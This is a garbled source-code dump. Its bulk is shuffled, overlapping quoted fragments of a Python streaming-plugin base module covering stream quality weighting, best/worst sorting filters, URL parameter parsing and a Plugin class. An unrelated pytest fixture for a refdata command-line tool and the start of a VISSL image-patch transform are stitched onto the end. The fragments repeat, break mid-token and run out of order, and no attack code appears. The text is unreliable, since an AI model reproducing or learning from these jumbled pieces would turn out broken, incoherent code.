QUALITY_WEIGTHS_EXTRA.items(): if stream in weights: return weights[stream], group", "stream names as input. 
:param stream_types: A list of stream", "continue elif num_alts > 0: name = \"{0}{1}\".format(name, num_alts +", "except ValueError: prio = 99 return prio def stream_sorting_filter(expr, stream_weight):", "the plugin will operate on \"\"\" cache = None logger", "filter expressions or a function that is passed to filter().", "raise NotImplementedError @classmethod def set_option(cls, key, value): cls.options.set(key, value) @classmethod", "NotImplementedError @classmethod def set_option(cls, key, value): cls.options.set(key, value) @classmethod def", "= self._get_streams() if isinstance(ostreams, dict): ostreams = ostreams.items() # Flatten", "be either of these types: - A list of filter", "name in streams: name = \"{0}_alt\".format(name) num_alts = len(list(filter(lambda n:", "== filter_group: return not op(weight, filter_weight) return True return func", "if isinstance(sorting_excludes, list): for expr in sorting_excludes: filter_func = stream_sorting_filter(expr,", "\"{0}_{1}\".format(name, stream_type) if name in streams: name = \"{0}_alt\".format(name) num_alts", "= list(filter(sorting_excludes, sorted_streams)) final_sorted_streams = OrderedDict() for stream_name in sorted(streams,", "def parse_params(params): rval = {} matches = re.findall(PARAMS_REGEX, params) for", "can now be a list of filter expressions or a", "1.4.2 Added *priority* parameter. .. versionchanged:: 1.5.0 Renamed *priority* to", "= type(existing).shortname() if existing_stream_type != stream_type: name = \"{0}_{1}\".format(name, stream_type)", "= stream_types.index(\"*\") except ValueError: prio = 99 return prio def", "from ..options import Options # FIXME: This is a crude", "function that is passed to filter() with a list of", "shouldn't need more than 2 alt streams if num_alts >=", "\"hd\": 1080, \"sd\": 576, }, \"quality\": { \"ehq\": 720, \"hq\":", "# Validate stream name and discard the stream if it's", "\"<\": operator.lt, \"<=\": operator.le, \">\": operator.gt, \">=\": operator.ge, } PARAMS_REGEX", "has been ignored \" \"since it is badly named.\", name)", "1)) stream_names = filter(stream_weight_only, streams.keys()) sorted_streams = sorted(stream_names, key=stream_weight_only) if", "except Exception: pass rval[key] = value return rval class Plugin(object):", "OrderedDict() for stream_name in sorted(streams, key=stream_weight_only): final_sorted_streams[stream_name] = streams[stream_name] if", "name_type == \"k\": # bit rate bitrate = int(match.group(1)) weight", "_alt from any stream names if name.endswith(\"_alt\"): name = name[:-len(\"_alt\")]", "set_option(cls, key, value): cls.options.set(key, value) @classmethod def get_option(cls, key): return", "stream_sorting_filter(expr, stream_weight): match = re.match(r\"(?P<op><=|>=|<|>)?(?P<value>[\\w+]+)\", expr) if not match: raise", "stream) if match: weight = 0 if match.group(6): if match.group(7):", "and 1)) stream_names = filter(stream_weight_only, streams.keys()) sorted_streams = sorted(stream_names, key=stream_weight_only)", "operator.ge, } PARAMS_REGEX = r\"(\\w+)=({.+?}|\\[.+?\\]|\\(.+?\\)|'(?:[^'\\\\]|\\\\')*'|\\\"(?:[^\\\"\\\\]|\\\\\\\")*\\\"|\\S+)\" HIGH_PRIORITY = 30 NORMAL_PRIORITY =", "r\"(\\w+)=({.+?}|\\[.+?\\]|\\(.+?\\)|'(?:[^'\\\\]|\\\\')*'|\\\"(?:[^\\\"\\\\]|\\\\\\\")*\\\"|\\S+)\" HIGH_PRIORITY = 30 NORMAL_PRIORITY = 20 LOW_PRIORITY = 10", "url): \"\"\" Return the plugin priority for a given URL,", "Options() session = None @classmethod def bind(cls, session, module): cls.cache", "= 
r\"(\\w+)=({.+?}|\\[.+?\\]|\\(.+?\\)|'(?:[^'\\\\]|\\\\')*'|\\\"(?:[^\\\"\\\\]|\\\\\\\")*\\\"|\\S+)\" HIGH_PRIORITY = 30 NORMAL_PRIORITY = 20 LOW_PRIORITY =", "stream_weight(stream) @classmethod def default_stream_types(cls, streams): stream_types = [\"rtmp\", \"hls\", \"hds\",", "due to \" \"changes to the service preventing a working", "a :class:`Stream` object. The result can contain the synonyms **best**", "to match other stream types if \"*\" not in stream_types", "ALT_WEIGHT_MOD name_type = match.group(2) if name_type == \"k\": # bit", "and priorities sorted_streams = sorted(iterate_streams(ostreams), key=partial(stream_type_priority, stream_types)) streams = {}", "multiple streams with the same name are found, the order", "= stream_types.index(stream_type) except ValueError: try: prio = stream_types.index(\"*\") except ValueError:", "\"sq\": 360, }, } FILTER_OPERATORS = { \"<\": operator.lt, \"<=\":", "= self.default_stream_types(ostreams) # Add streams depending on stream type and", "streams = {} for name, stream in sorted_streams: stream_type =", "functools import partial from ..cache import Cache from ..exceptions import", ":param url: URL that the plugin will operate on \"\"\"", "= ostreams.items() # Flatten the iterator to a list so", "equality will be tested. - A function that is passed", "__init__(self, url): self.url = url @classmethod def can_handle_url(cls, url): raise", "weight -= ALT_WEIGHT_MOD * int(match.group(7)) else: weight -= ALT_WEIGHT_MOD name_type", "return 0, \"none\" def iterate_streams(streams): for name, stream in streams:", "cls.logger = session.logger.new_module(\"plugin.\" + module) cls.module = module cls.session =", "a given URL, by default it returns NORMAL priority. :return:", "stream_types: A list of stream types to return. :param sorting_excludes:", "stream_type: name = \"{0}_{1}\".format(name, stream_type) if name in streams: name", "num_alts >= 2: continue elif num_alts > 0: name =", "will operate on \"\"\" cache = None logger = None", "PluginError, NoStreamsError from ..options import Options # FIXME: This is", "yield (name, sub_stream) else: yield (name, stream) def stream_type_priority(stream_types, stream):", "split[0] params = split[1] if len(split) > 1 else ''", "A list of stream types to return. :param sorting_excludes: Specify", "= sorted_streams[0] final_sorted_streams[\"worst\"] = streams[worst] final_sorted_streams[\"best\"] = streams[best] return final_sorted_streams", "for key, value in matches: try: value = ast.literal_eval(value) except", "\"bitrate\" elif name_type == \"p\": # resolution weight += int(match.group(1))", "Use * as wildcard to match other stream types if", "in the format *[operator]<value>*. For example the filter \">480p\" will", "which are likely to be of highest and lowest quality", "**kwargs): \"\"\"Deprecated since version 1.9.0. Has been renamed to :func:`Plugin.streams`,", "def get_streams(self, *args, **kwargs): \"\"\"Deprecated since version 1.9.0. Has been", "commonly the quality and the value is a :class:`Stream` object.", "the quality and the value is a :class:`Stream` object. The", "names if name.endswith(\"_alt\"): name = name[:-len(\"_alt\")] existing = streams.get(name) if", "cls.module = module cls.session = session def __init__(self, url): self.url", "of filter expressions in the format *[operator]<value>*. 
import ast
import operator
import re

from collections import OrderedDict
from functools import partial

from ..cache import Cache
from ..exceptions import PluginError, NoStreamsError
from ..options import Options

# FIXME: This is a crude attempt at making a bitrate's
# weight end up similar to the weight of a resolution.
# Someone who knows math, please fix.
BIT_RATE_WEIGHT_RATIO = 2.8

ALT_WEIGHT_MOD = 0.01

QUALITY_WEIGTHS_EXTRA = {
    "other": {
        "live": 1080,
    },
    "tv": {
        "hd": 1080,
        "sd": 576,
    },
    "quality": {
        "ehq": 720,
        "hq": 576,
        "sq": 360,
    },
}

FILTER_OPERATORS = {
    "<": operator.lt,
    "<=": operator.le,
    ">": operator.gt,
    ">=": operator.ge,
}

PARAMS_REGEX = r"(\w+)=({.+?}|\[.+?\]|\(.+?\)|'(?:[^'\\]|\\')*'|\"(?:[^\"\\]|\\\")*\"|\S+)"

HIGH_PRIORITY = 30
NORMAL_PRIORITY = 20
LOW_PRIORITY = 10
NO_PRIORITY = 0

def stream_weight(stream):
    for group, weights in QUALITY_WEIGTHS_EXTRA.items():
        if stream in weights:
            return weights[stream], group

    match = re.match(r"^(\d+)(k|p)?(\d+)?(\+)?(?:_(\d+)k)?(?:_(alt)(\d)?)?$", stream)

    if match:
        weight = 0

        if match.group(6):
            if match.group(7):
                weight -= ALT_WEIGHT_MOD * int(match.group(7))
            else:
                weight -= ALT_WEIGHT_MOD

        name_type = match.group(2)
        if name_type == "k":  # bit rate
            bitrate = int(match.group(1))
            weight += bitrate / BIT_RATE_WEIGHT_RATIO

            return weight, "bitrate"

        elif name_type == "p":  # resolution
            weight += int(match.group(1))

            if match.group(3):  # fps eg. 60p or 50p
                weight += int(match.group(3))

            if match.group(4) == "+":
                weight += 1

            if match.group(5):  # bit rate classifier for resolution
                weight += int(match.group(5)) / BIT_RATE_WEIGHT_RATIO

            return weight, "pixels"

    return 0, "none"

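
# Illustrative check of the weighting above (an assumption-labeled sketch,
# not part of the original module): resolution names gain their pixel
# height plus any fps suffix, while bitrate names are scaled down by
# BIT_RATE_WEIGHT_RATIO so the two groups land in a comparable range.
def _example_stream_weight():
    assert stream_weight("720p60") == (780, "pixels")  # 720 + 60 fps
    assert stream_weight("1080p") == (1080, "pixels")
    assert stream_weight("live") == (1080, "other")    # from QUALITY_WEIGTHS_EXTRA
    weight, group = stream_weight("1500k")
    assert group == "bitrate" and 535 < weight < 536   # 1500 / 2.8
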
def iterate_streams(streams):
    for name, stream in streams:
        if isinstance(stream, list):
            for sub_stream in stream:
                yield (name, sub_stream)
        else:
            yield (name, stream)


def stream_type_priority(stream_types, stream):
    stream_type = type(stream[1]).shortname()

    try:
        prio = stream_types.index(stream_type)
    except ValueError:
        try:
            prio = stream_types.index("*")
        except ValueError:
            prio = 99

    return prio


def stream_sorting_filter(expr, stream_weight):
    match = re.match(r"(?P<op><=|>=|<|>)?(?P<value>[\w+]+)", expr)

    if not match:
        raise PluginError("Invalid filter expression: {0}".format(expr))

    op, value = match.group("op", "value")
    op = FILTER_OPERATORS.get(op, operator.eq)
    filter_weight, filter_group = stream_weight(value)

    def func(quality):
        weight, group = stream_weight(quality)

        if group == filter_group:
            return not op(weight, filter_weight)

        return True

    return func

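
# Hedged usage sketch (not in the original source): a filter built from
# the expression ">480p" rejects names whose pixel weight exceeds 480,
# which is how *sorting_excludes* prunes the best/worst candidates in
# Plugin.streams() below.
def _example_sorting_filter():
    func = stream_sorting_filter(">480p", stream_weight)
    names = ["240p", "480p", "720p", "1080p"]
    return list(filter(func, names))  # -> ["240p", "480p"]
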
def parse_url_params(url):
    split = url.split(" ", 1)
    url = split[0]
    params = split[1] if len(split) > 1 else ''
    return url, parse_params(params)


def parse_params(params):
    rval = {}
    matches = re.findall(PARAMS_REGEX, params)

    for key, value in matches:
        try:
            value = ast.literal_eval(value)
        except Exception:
            pass

        rval[key] = value

    return rval

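
# Hedged example (hypothetical URL, not from the original module): the
# space-separated suffix of a URL is parsed into keyword options, with
# ast.literal_eval turning literals such as numbers into Python values
# while plain words stay strings.
def _example_parse_url_params():
    url, params = parse_url_params("http://example.com/live timeout=30 mode=fast")
    # -> ("http://example.com/live", {"timeout": 30, "mode": "fast"})
    return url, params
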
class Plugin(object):
    """A plugin can retrieve stream information from the URL specified.

    :param url: URL that the plugin will operate on
    """

    cache = None
    logger = None
    module = "unknown"
    options = Options()
    session = None

    @classmethod
    def bind(cls, session, module):
        cls.cache = Cache(filename="plugin-cache.json",
                          key_prefix=module)
        cls.logger = session.logger.new_module("plugin." + module)
        cls.module = module
        cls.session = session

    def __init__(self, url):
        self.url = url

    @classmethod
    def can_handle_url(cls, url):
        raise NotImplementedError

    @classmethod
    def set_option(cls, key, value):
        cls.options.set(key, value)

    @classmethod
    def get_option(cls, key):
        return cls.options.get(key)

    @classmethod
    def stream_weight(cls, stream):
        return stream_weight(stream)

    @classmethod
    def default_stream_types(cls, streams):
        stream_types = ["rtmp", "hls", "hds", "http"]

        for name, stream in iterate_streams(streams):
            stream_type = type(stream).shortname()

            if stream_type not in stream_types:
                stream_types.append(stream_type)

        return stream_types

    @classmethod
    def broken(cls, issue=None):
        def func(*args, **kwargs):
            msg = (
                "This plugin has been marked as broken. This is likely due to "
                "changes to the service preventing a working implementation. "
            )

            if issue:
                msg += "More info: https://github.com/streamlink/streamlink/issues/{0}".format(issue)

            raise PluginError(msg)

        def decorator(*args, **kwargs):
            return func

        return decorator

    @classmethod
    def priority(cls, url):
        """
        Return the plugin priority for a given URL, by default it returns
        NORMAL priority.

        :return: priority level
        """
        return NORMAL_PRIORITY

    def streams(self, stream_types=None, sorting_excludes=None):
        """Attempts to extract available streams.

        Returns a :class:`dict` containing the streams, where the key is
        the name of the stream, most commonly the quality, and the value
        is a :class:`Stream` object.

        The result can contain the synonyms **best** and **worst**, which
        point to the streams that are likely to be of highest and
        lowest quality respectively.

        If multiple streams with the same name are found, the order of
        streams specified in *stream_types* will determine which stream
        gets to keep the name while the rest will be renamed to
        "<name>_<stream type>".

        The synonyms can be fine tuned with the *sorting_excludes*
        parameter. This can be either of these types:

          - A list of filter expressions in the format
            *[operator]<value>*. For example the filter ">480p" will
            exclude streams ranked higher than "480p" from the list
            used in the synonyms ranking. Valid operators are >, >=, <
            and <=. If no operator is specified then equality will be
            tested.

          - A function that is passed to filter() with a list of stream
            names as input.

        :param stream_types: A list of stream types to return.
        :param sorting_excludes: Specify which streams to exclude from
                                 the best/worst synonyms.

        .. versionchanged:: 1.4.2
           Added *priority* parameter.

        .. versionchanged:: 1.5.0
           Renamed *priority* to *stream_types* and changed
           behaviour slightly.

        .. versionchanged:: 1.5.0
           Added *sorting_excludes* parameter.

        .. versionchanged:: 1.6.0
           *sorting_excludes* can now be a list of filter expressions
           or a function that is passed to filter().
        """

        try:
            ostreams = self._get_streams()
            if isinstance(ostreams, dict):
                ostreams = ostreams.items()

            # Flatten the iterator to a list so we can reuse it.
            if ostreams:
                ostreams = list(ostreams)
        except NoStreamsError:
            return {}
        except (IOError, OSError, ValueError) as err:
            raise PluginError(err)

        if not ostreams:
            return {}

        if stream_types is None:
            stream_types = self.default_stream_types(ostreams)

        # Add streams depending on stream type and priorities
        sorted_streams = sorted(iterate_streams(ostreams),
                                key=partial(stream_type_priority,
                                            stream_types))

        streams = {}
        for name, stream in sorted_streams:
            stream_type = type(stream).shortname()

            # Use * as wildcard to match other stream types
            if "*" not in stream_types and stream_type not in stream_types:
                continue

            # drop _alt from any stream names
            if name.endswith("_alt"):
                name = name[:-len("_alt")]

            existing = streams.get(name)
            if existing:
                existing_stream_type = type(existing).shortname()
                if existing_stream_type != stream_type:
                    name = "{0}_{1}".format(name, stream_type)

                if name in streams:
                    name = "{0}_alt".format(name)
                    num_alts = len(list(filter(lambda n: n.startswith(name),
                                               streams.keys())))

                    # We shouldn't need more than 2 alt streams
                    if num_alts >= 2:
                        continue
                    elif num_alts > 0:
                        name = "{0}{1}".format(name, num_alts + 1)

            # Validate stream name and discard the stream if it's bad.
            match = re.match("([A-z0-9_+]+)", name)
            if match:
                name = match.group(1)
            else:
                self.logger.debug("The stream '{0}' has been ignored "
                                  "since it is badly named.", name)
                continue

            # Force lowercase name and replace space with underscore.
            streams[name.lower()] = stream

        # Create the best/worst synonyms
        def stream_weight_only(s):
            return (self.stream_weight(s)[0] or
                    (len(streams) == 1 and 1))

        stream_names = filter(stream_weight_only, streams.keys())
        sorted_streams = sorted(stream_names, key=stream_weight_only)

        if isinstance(sorting_excludes, list):
            for expr in sorting_excludes:
                filter_func = stream_sorting_filter(expr, self.stream_weight)
                sorted_streams = list(filter(filter_func, sorted_streams))
        elif callable(sorting_excludes):
            sorted_streams = list(filter(sorting_excludes, sorted_streams))

        final_sorted_streams = OrderedDict()

        for stream_name in sorted(streams, key=stream_weight_only):
            final_sorted_streams[stream_name] = streams[stream_name]

        if len(sorted_streams) > 0:
            best = sorted_streams[-1]
            worst = sorted_streams[0]
            final_sorted_streams["worst"] = streams[worst]
            final_sorted_streams["best"] = streams[best]

        return final_sorted_streams

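    # Hedged usage sketch (illustrative, not part of the original file):
    # both forms below only narrow the candidate names that feed the
    # "best"/"worst" synonyms; every stream still appears under its own
    # name in the returned dict.
    #
    #   plugin.streams(sorting_excludes=[">720p"])
    #   plugin.streams(sorting_excludes=lambda name: not name.endswith("_alt"))
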
:param url: URL", "existing: existing_stream_type = type(existing).shortname() if existing_stream_type != stream_type: name =", "@classmethod def default_stream_types(cls, streams): stream_types = [\"rtmp\", \"hls\", \"hds\", \"http\"]", "**kwargs): return func return decorator @classmethod def priority(cls, url): \"\"\"", "drop _alt from any stream names if name.endswith(\"_alt\"): name =", "stream: yield (name, sub_stream) else: yield (name, stream) def stream_type_priority(stream_types,", "match.group(5): # bit rate classifier for resolution weight += int(match.group(5))", "filter_func = stream_sorting_filter(expr, self.stream_weight) sorted_streams = list(filter(filter_func, sorted_streams)) elif callable(sorting_excludes):", "points to the streams which are likely to be of", "if group == filter_group: return not op(weight, filter_weight) return True", "bind(cls, session, module): cls.cache = Cache(filename=\"plugin-cache.json\", key_prefix=module) cls.logger = session.logger.new_module(\"plugin.\"", "specified then equality will be tested. - A function that", "stream_sorting_filter(expr, self.stream_weight) sorted_streams = list(filter(filter_func, sorted_streams)) elif callable(sorting_excludes): sorted_streams =", "stream) def stream_type_priority(stream_types, stream): stream_type = type(stream[1]).shortname() try: prio =", "20 LOW_PRIORITY = 10 NO_PRIORITY = 0 def stream_weight(stream): for", "with underscore. streams[name.lower()] = stream # Create the best/worst synonmys", "is passed to filter() with a list of stream names", "sorting_excludes: Specify which streams to exclude from the best/worst synonyms.", "= filter(stream_weight_only, streams.keys()) sorted_streams = sorted(stream_names, key=stream_weight_only) if isinstance(sorting_excludes, list):", "parse_url_params(url): split = url.split(\" \", 1) url = split[0] params", "err: raise PluginError(err) if not ostreams: return {} if stream_types", "The result can contain the synonyms **best** and **worst** which", "can reuse it. if ostreams: ostreams = list(ostreams) except NoStreamsError:", "except NoStreamsError: return {} except (IOError, OSError, ValueError) as err:", "than 2 alt streams if num_alts >= 2: continue elif", "\" \"since it is badly named.\", name) continue # Force", "in streams: if isinstance(stream, list): for sub_stream in stream: yield", "{0}\".format(expr)) op, value = match.group(\"op\", \"value\") op = FILTER_OPERATORS.get(op, operator.eq)", "stream name and discard the stream if it's bad. match", "replace space with underscore. streams[name.lower()] = stream # Create the", "sorted_streams = sorted(stream_names, key=stream_weight_only) if isinstance(sorting_excludes, list): for expr in", "2: continue elif num_alts > 0: name = \"{0}{1}\".format(name, num_alts", "a resolution. # Someone who knows math, please fix. 
BIT_RATE_WEIGHT_RATIO", "}, } FILTER_OPERATORS = { \"<\": operator.lt, \"<=\": operator.le, \">\":", "= name[:-len(\"_alt\")] existing = streams.get(name) if existing: existing_stream_type = type(existing).shortname()", "n: n.startswith(name), streams.keys()))) # We shouldn't need more than 2", "(name, sub_stream) else: yield (name, stream) def stream_type_priority(stream_types, stream): stream_type", "1 and 1)) stream_names = filter(stream_weight_only, streams.keys()) sorted_streams = sorted(stream_names,", "a :class:`dict` containing the streams, where the key is the", "match = re.match(r\"^(\\d+)(k|p)?(\\d+)?(\\+)?(?:_(\\d+)k)?(?:_(alt)(\\d)?)?$\", stream) if match: weight = 0 if", "stream_weight): match = re.match(r\"(?P<op><=|>=|<|>)?(?P<value>[\\w+]+)\", expr) if not match: raise PluginError(\"Invalid", "NoStreamsError from ..options import Options # FIXME: This is a", "a list of stream names as input. :param stream_types: A", "+= int(match.group(3)) if match.group(4) == \"+\": weight += 1 if", "not in stream_types: stream_types.append(stream_type) return stream_types @classmethod def broken(cls, issue=None):", "\"More info: https://github.com/streamlink/streamlink/issues/{0}\".format(issue) raise PluginError(msg) def decorator(*args, **kwargs): return func", "= [\"rtmp\", \"hls\", \"hds\", \"http\"] for name, stream in iterate_streams(streams):", "info: https://github.com/streamlink/streamlink/issues/{0}\".format(issue) raise PluginError(msg) def decorator(*args, **kwargs): return func return", "n.startswith(name), streams.keys()))) # We shouldn't need more than 2 alt", "raise PluginError(msg) def decorator(*args, **kwargs): return func return decorator @classmethod", "likely due to \" \"changes to the service preventing a", "the same name are found, the order of streams specified", "lowercase name and replace space with underscore. streams[name.lower()] = stream", "!= stream_type: name = \"{0}_{1}\".format(name, stream_type) if name in streams:", "in stream_types: stream_types.append(stream_type) return stream_types @classmethod def broken(cls, issue=None): def", "60p or 50p weight += int(match.group(3)) if match.group(4) == \"+\":", "stream_types=None, sorting_excludes=None): \"\"\"Attempts to extract available streams. Returns a :class:`dict`", "wildcard to match other stream types if \"*\" not in", "stream in sorted_streams: stream_type = type(stream).shortname() # Use * as", "the stream, most commonly the quality and the value is", "def broken(cls, issue=None): def func(*args, **kwargs): msg = ( \"This", "name of the stream, most commonly the quality and the", "will determine which stream gets to keep the name while", ".. versionchanged:: 1.5.0 Added *sorting_excludes* parameter. .. versionchanged:: 1.6.0 *sorting_excludes*", "continue # drop _alt from any stream names if name.endswith(\"_alt\"):", "stream): return stream_weight(stream) @classmethod def default_stream_types(cls, streams): stream_types = [\"rtmp\",", "if it's bad. match = re.match(\"([A-z0-9_+]+)\", name) if match: name", "space with underscore. 
streams[name.lower()] = stream # Create the best/worst", "options = Options() session = None @classmethod def bind(cls, session,", "weight += bitrate / BIT_RATE_WEIGHT_RATIO return weight, \"bitrate\" elif name_type", "continue # Force lowercase name and replace space with underscore.", "op = FILTER_OPERATORS.get(op, operator.eq) filter_weight, filter_group = stream_weight(value) def func(quality):", "best/worst synonmys def stream_weight_only(s): return (self.stream_weight(s)[0] or (len(streams) == 1", "*sorting_excludes* can now be a list of filter expressions or", "not match: raise PluginError(\"Invalid filter expression: {0}\".format(expr)) op, value =", "\"<=\": operator.le, \">\": operator.gt, \">=\": operator.ge, } PARAMS_REGEX = r\"(\\w+)=({.+?}|\\[.+?\\]|\\(.+?\\)|'(?:[^'\\\\]|\\\\')*'|\\\"(?:[^\\\"\\\\]|\\\\\\\")*\\\"|\\S+)\"", "# drop _alt from any stream names if name.endswith(\"_alt\"): name", "= len(list(filter(lambda n: n.startswith(name), streams.keys()))) # We shouldn't need more", "op(weight, filter_weight) return True return func def parse_url_params(url): split =", ") if issue: msg += \"More info: https://github.com/streamlink/streamlink/issues/{0}\".format(issue) raise PluginError(msg)", "of highest and lowest quality respectively. If multiple streams with", "with the same name are found, the order of streams", "# Add streams depending on stream type and priorities sorted_streams", "= module cls.session = session def __init__(self, url): self.url =", "priority level \"\"\" return NORMAL_PRIORITY def streams(self, stream_types=None, sorting_excludes=None): \"\"\"Attempts", "url: URL that the plugin will operate on \"\"\" cache", "where the key is the name of the stream, most", "filter \">480p\" will exclude streams ranked higher than \"480p\" from", "stream_weight_only(s): return (self.stream_weight(s)[0] or (len(streams) == 1 and 1)) stream_names", "in sorted(streams, key=stream_weight_only): final_sorted_streams[stream_name] = streams[stream_name] if len(sorted_streams) > 0:", "in QUALITY_WEIGTHS_EXTRA.items(): if stream in weights: return weights[stream], group match", "**best** and **worst** which points to the streams which are", "with a list of stream names as input. :param stream_types:", "name while the rest will be renamed to \"<name>_<stream type>\".", "if not ostreams: return {} if stream_types is None: stream_types", "isinstance(stream, list): for sub_stream in stream: yield (name, sub_stream) else:", "<=. 
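
# Example (illustrative values, not part of the original module): how
# parse_url_params() splits a URL from its trailing key=value options,
# with values coerced by ast.literal_eval() where possible:
#
#     >>> parse_url_params("http://example.com/stream quality='720p' verify=False")
#     ('http://example.com/stream', {'quality': '720p', 'verify': False})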

class Plugin(object):
    """A plugin can retrieve stream information from the URL specified.

    :param url: URL that the plugin will operate on
    """

    cache = None
    logger = None
    module = "unknown"
    options = Options()
    session = None

    @classmethod
    def bind(cls, session, module):
        cls.cache = Cache(filename="plugin-cache.json", key_prefix=module)
        cls.logger = session.logger.new_module("plugin." + module)
        cls.module = module
        cls.session = session

    def __init__(self, url):
        self.url = url

    @classmethod
    def can_handle_url(cls, url):
        raise NotImplementedError

    @classmethod
    def set_option(cls, key, value):
        cls.options.set(key, value)

    @classmethod
    def get_option(cls, key):
        return cls.options.get(key)

    @classmethod
    def stream_weight(cls, stream):
        return stream_weight(stream)

    @classmethod
    def default_stream_types(cls, streams):
        stream_types = ["rtmp", "hls", "hds", "http"]

        for name, stream in iterate_streams(streams):
            stream_type = type(stream).shortname()

            if stream_type not in stream_types:
                stream_types.append(stream_type)

        return stream_types

    @classmethod
    def broken(cls, issue=None):
        def func(*args, **kwargs):
            msg = (
                "This plugin has been marked as broken. This is likely due to "
                "changes to the service preventing a working implementation. "
            )

            if issue:
                msg += "More info: https://github.com/streamlink/streamlink/issues/{0}".format(issue)

            raise PluginError(msg)

        def decorator(*args, **kwargs):
            return func

        return decorator

    @classmethod
    def priority(cls, url):
        """
        Return the plugin priority for a given URL, by default it returns
        NORMAL priority.

        :return: priority level
        """
        return NORMAL_PRIORITY

    def streams(self, stream_types=None, sorting_excludes=None):
        """Attempts to extract available streams.

        Returns a :class:`dict` containing the streams, where the key is
        the name of the stream, most commonly the quality and the value
        is a :class:`Stream` object.

        The result can contain the synonyms **best** and **worst** which
        point to the streams which are likely to be of highest and
        lowest quality respectively.

        If multiple streams with the same name are found, the order of
        streams specified in *stream_types* will determine which stream
        gets to keep the name while the rest will be renamed to
        "<name>_<stream type>".

        The synonyms can be fine-tuned with the *sorting_excludes*
        parameter, which can be one of these types:

            - A list of filter expressions in the format
              *[operator]<value>*. For example the filter ">480p" will
              exclude streams ranked higher than "480p" from the list
              used in the synonyms ranking. Valid operators are >, >=,
              < and <=. If no operator is specified then equality will
              be tested.

            - A function that is passed to filter() with a list of
              stream names as input.

        :param stream_types: A list of stream types to return.
        :param sorting_excludes: Specify which streams to exclude from
                                 the best/worst synonyms.

        .. versionchanged:: 1.5.0
           Renamed *priority* to *stream_types* and changed behaviour slightly.

        .. versionchanged:: 1.5.0
           Added *sorting_excludes* parameter.

        .. versionchanged:: 1.6.0
           *sorting_excludes* can now be a list of filter expressions
           or a function that is passed to filter().
        """

        try:
            ostreams = self._get_streams()
            if isinstance(ostreams, dict):
                ostreams = ostreams.items()

            # Flatten the iterator to a list so we can reuse it.
            if ostreams:
                ostreams = list(ostreams)
        except NoStreamsError:
            return {}
        except (IOError, OSError, ValueError) as err:
            raise PluginError(err)

        if not ostreams:
            return {}

        if stream_types is None:
            stream_types = self.default_stream_types(ostreams)

        # Add streams depending on stream type and priorities
        sorted_streams = sorted(iterate_streams(ostreams),
                                key=partial(stream_type_priority, stream_types))

        streams = {}
        for name, stream in sorted_streams:
            stream_type = type(stream).shortname()

            # Use * as wildcard to match other stream types
            if "*" not in stream_types and stream_type not in stream_types:
                continue

            # drop _alt from any stream names
            if name.endswith("_alt"):
                name = name[:-len("_alt")]

            existing = streams.get(name)
            if existing:
                existing_stream_type = type(existing).shortname()
                if existing_stream_type != stream_type:
                    name = "{0}_{1}".format(name, stream_type)

                if name in streams:
                    name = "{0}_alt".format(name)
                    num_alts = len(list(filter(lambda n: n.startswith(name),
                                               streams.keys())))

                    # We shouldn't need more than 2 alt streams
                    if num_alts >= 2:
                        continue
                    elif num_alts > 0:
                        name = "{0}{1}".format(name, num_alts + 1)

            # Validate stream name and discard the stream if it's bad.
            match = re.match("([A-z0-9_+]+)", name)
            if match:
                name = match.group(1)
            else:
                self.logger.debug("The stream '{0}' has been ignored "
                                  "since it is badly named.", name)
                continue

            # Force lowercase name and replace space with underscore.
            streams[name.lower()] = stream

        # Create the best/worst synonyms
        def stream_weight_only(s):
            return (self.stream_weight(s)[0] or
                    (len(streams) == 1 and 1))

        stream_names = filter(stream_weight_only, streams.keys())
        sorted_streams = sorted(stream_names, key=stream_weight_only)

        if isinstance(sorting_excludes, list):
            for expr in sorting_excludes:
                filter_func = stream_sorting_filter(expr, self.stream_weight)
                sorted_streams = list(filter(filter_func, sorted_streams))
        elif callable(sorting_excludes):
            sorted_streams = list(filter(sorting_excludes, sorted_streams))

        final_sorted_streams = OrderedDict()

        for stream_name in sorted(streams, key=stream_weight_only):
            final_sorted_streams[stream_name] = streams[stream_name]

        if len(sorted_streams) > 0:
            best = sorted_streams[-1]
            worst = sorted_streams[0]
            final_sorted_streams["worst"] = streams[worst]
            final_sorted_streams["best"] = streams[best]

        return final_sorted_streams

    def get_streams(self, *args, **kwargs):
        """Deprecated since version 1.9.0.

        Has been renamed to :func:`Plugin.streams`, this is an alias
        for backwards compatibility.
        """
        return self.streams(*args, **kwargs)

    def _get_streams(self):
        raise NotImplementedError


__all__ = ["Plugin"]
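
# Illustration of the *sorting_excludes* filter expressions documented in
# Plugin.streams() above (a sketch with made-up stream names, not part of
# the original module): ">480p" drops streams ranked above 480p from the
# best/worst ranking while names in other weight groups pass through.
#
#     >>> keep = stream_sorting_filter(">480p", stream_weight)
#     >>> list(filter(keep, ["240p", "480p", "720p", "1080p"]))
#     ['240p', '480p']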

# This file is part of the Reference Data Repository (refdata).
#
# Copyright (C) 2021 New York University.
#
# refdata is free software; you can redistribute it and/or modify it under the
# terms of the MIT License; see LICENSE file for more details.

"""Fixtures for testing the command-line interface."""

import os
import pytest

from click.testing import CliRunner

from refdata.db import DB

import refdata.config as config


@pytest.fixture
def refdata_cli(tmpdir):
    """Initialize the environment and the database for the local store."""
    basedir = os.path.abspath(str(tmpdir))
    connect_url = 'sqlite:///{}'.format(os.path.join(basedir, 'test.db'))
    DB(connect_url=connect_url).init()
    os.environ[config.ENV_BASEDIR] = basedir
    os.environ[config.ENV_URL] = connect_url
    # Make sure to reset the database.
    yield CliRunner()
    # Clear environment variables that were set for the test runner.
    del os.environ[config.ENV_BASEDIR]
    del os.environ[config.ENV_URL]
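
# Hypothetical usage of the refdata_cli fixture above (illustration only).
# The import path of the click entry point is an assumption, not taken from
# the refdata package; adjust it to the real CLI module before use.
#
#     from refdata.cli.base import cli  # assumed entry point
#
#     def test_cli_help(refdata_cli):
#         # CliRunner.invoke() runs the click command in-process and
#         # captures its exit code and output.
#         result = refdata_cli.invoke(cli, ['--help'])
#         assert result.exit_code == 0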

<filename>swav/vissl/vissl/data/ssl_transforms/img_patches_tensor.py
# Copyright (c) Facebook, Inc. and its affiliates. All Rights Reserved

import logging
import math
from typing import Any, Dict

import numpy as np
from classy_vision.dataset.transforms import register_transform
from classy_vision.dataset.transforms.classy_transform import ClassyTransform


@register_transform("ImgPatchesFromTensor")
class ImgPatchesFromTensor(ClassyTransform):
    """
    Create image patches from a torch Tensor or numpy array.
    This transform was proposed in Jigsaw - https://arxiv.org/abs/1603.09246

    Args:
        num_patches (int): how many image patches to create
        patch_jitter (int): space to leave between patches
    """

    def __init__(self, num_patches=9, patch_jitter=21):
        self.num_patches = num_patches
        self.patch_jitter = patch_jitter
